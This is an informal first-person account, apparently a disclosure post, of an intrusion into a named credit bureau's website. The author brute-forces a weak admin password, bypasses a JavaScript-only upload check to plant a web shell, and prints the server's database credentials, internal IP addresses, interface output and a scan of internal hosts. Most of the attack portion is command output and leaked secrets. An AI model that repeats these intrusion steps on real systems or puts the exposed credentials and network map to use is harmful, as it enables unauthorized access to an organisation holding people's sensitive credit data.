Searched for quite a while and finally found the admin backend. Why have a backend at all? You could have made the whole thing static. Credit bureau homepages are basically all like this. This is the main site, so don't embarrass yourself. http://www.ccxcredit.com.cn/u_l Since the password is: admin 123456 (and it still made me run through a 100k-entry dictionary, shit, son of a bitch). My instinct says that on a site like this, with an upload function in the backend, getshell is surely possible.
Found the upload. The restriction is probably just a JS check.
Got a shell.
Looking for some intranet information:
#mysql config
db.driver.class=com.mysql.jdbc.Driver
#db.url=jdbc:mysql://localhost:3306/zx_news_db
#db.username=admin
#db.password=admin
db.url=jdbc:mysql://10.1.80.37:3306/zx_news_db?useUnicode=true&characterEncoding=UTF-8
db.username=test
db.password=test
#db.url=jdbc:mysql://10.0.5.152:3306/zx_news_db
#db.username=root
#db.password=123456
#oracle config
#db.driver.class = oracle.jdbc.driver.OracleDriver
#db.url = jdbc:oracle:thin:@10.0.1.40:1521:ccxe
#db.username = pccredit
#db.password = pccredit
#db.schema = PCCREDIT
#org upload file dir
org_file_path = resources/file_uploads
#nh xw score model supply project
1nh_xw_score_model_supplier = http://10.0.5.152:8080/ccx_credit_nm_20141210
ifconfig:
[/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ ifconfig
bond0     Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          inet addr:10.1.80.37  Bcast:10.1.80.255  Mask:255.255.255.0
          inet6 addr: fe80::d685:64ff:fe48:e5d8/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:215013915 errors:0 dropped:0 overruns:0 frame:0
          TX packets:105061985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:19123235861 (17.8 GiB)  TX bytes:112949825904 (105.1 GiB)

eth0      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:150213515 errors:0 dropped:0 overruns:0 frame:0
          TX packets:105061984 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:14426070048 (13.4 GiB)  TX bytes:112949825810 (105.1 GiB)
          Interrupt:114 Memory:fb000000-fb7fffff

eth1      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:64800400 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4697165813 (4.3 GiB)  TX bytes:94 (94.0 b)
          Interrupt:122 Memory:fa000000-fa7fffff

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:20860426 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20860426 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24514978721 (22.8 GiB)  TX bytes:24514978721 (22.8 GiB)
How can a credit bureau use passwords like this... and a network layout like this... A credit bureau is required to meet MLPS Level 3 (等保三级). How did this ever pass? Let's scan the subnet.
http://10.1.80.37 >> 中诚信征信有限公司 >> Apache-Coyote/1.1 >> Success
http://10.1.80.45 >> Insert title here >> Apache-Coyote/1.1 >> Success
http://10.1.80.21 >> >> Serv-U/10.5.0.11 >> Success
http://10.1.80.3 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success
http://10.1.80.2 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success
http://10.1.80.1 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success
http://10.0.5.254 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success
10.1.130.56
http://10.1.130.57 >> phpinfo() >> Apache/2.2.3 (Red Hat) >> Success
http://10.1.130.55 >> >> Apache/2.2.6 (Win32) mod_jk/1.2.21 >> Success
http://10.1.130.159 >> 302 Found >> Apache >> Success
http://10.1.130.111 >> >> Apache >> Success
http://10.1.130.156 >> 302 Found >> Apache >> Success
http://10.1.130.112 >> >> Apache >> Success
http://10.0.1.22 >> >> Apache/2.2.12 (Ubuntu) >> Success
http://10.0.1.28 >> IIS7 >> Microsoft-IIS/7.5 >> Success
http://10.0.1.250 >> Index >> Hikvision-Webs >> Success
http://10.0.1.254 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success (APP production network segment)
http://10.0.5.254 >> Log In - Juniper Web Device Manager >> Mbedthis-Appweb/2.4.0 >> Success
So the network segments are not isolated at all. WAF? IDS? IPS? Firewall? Dedicated network? VDI? Why is none of it restricted?
[/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ nmap -iflist
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2016-01-27 14:01 CST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK        TYPE      UP  MAC
lo     (lo)     127.0.0.1/8    loopback  up
bond0  (bond0)  10.1.80.37/24  ethernet  up  D4:85:64:48:E5:D8
**************************ROUTES**************************
DST/MASK       DEV    GATEWAY
10.1.80.0/0    bond0
169.254.0.0/0  bond0
0.0.0.0/0      bond0  10.1.80.1
Oh my god.